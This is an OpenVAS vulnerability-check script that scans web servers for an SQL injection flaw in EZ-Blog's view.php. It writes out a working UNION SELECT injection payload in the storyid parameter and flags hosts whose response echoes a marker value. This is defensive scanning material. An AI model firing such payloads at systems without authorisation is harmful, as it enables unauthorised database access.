###############################################################################
# OpenVAS Vulnerability Test
# $Id: ezblog_sql_injection.nasl 80 2009-03-05 12:09:01Z mime $
#
# EZ-Blog 'public/view.php' SQL Injection Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Michael Meyer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100012);
 script_bugtraq_id(33947);
 script_version ("1.0");

 script_name(english:"EZ-Blog 'public/view.php' SQL Injection Vulnerability");
 desc["english"] = "

 Overview:
  EZ-Blog is prone to an SQL-injection vulnerability because it fails to
  sufficiently sanitize user-supplied data before using it in an SQL query.

  Exploiting this issue could allow an attacker to compromise the application,
  access or modify data, or exploit latent vulnerabilities in the underlying
  database.

  EZ-Blog Beta 1 is vulnerable; other versions may also be affected. 

 Solution:
  Update to newer version if available at http://sourceforge.net/projects/ez-blog/
  or set 'magic_quotes_gpc = On' in php.ini.

 Risk factor : Medium";

 script_description(english:desc["english"]);
 script_summary(english:"Determine if EZ-Blog is vulnerable to SQL Injection");
 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses");
 script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
 script_dependencie("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);

dir = make_list("/blog","/ezblog", cgi_dirs()); 
 
foreach d (dir)
{ 
 url = string(d, "/public/view.php?storyid=-1%27%20UNION%20ALL%20SELECT%201,2,132323231,4,5,6,7,8,9,10%23");
 req = http_get(item:url, port:port);
 buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
 if( buf == NULL )continue;
 if( buf =~ "Category: 132323231" )
   {    
    security_warning(port:port);
    exit(0);
   }
}
exit(0);
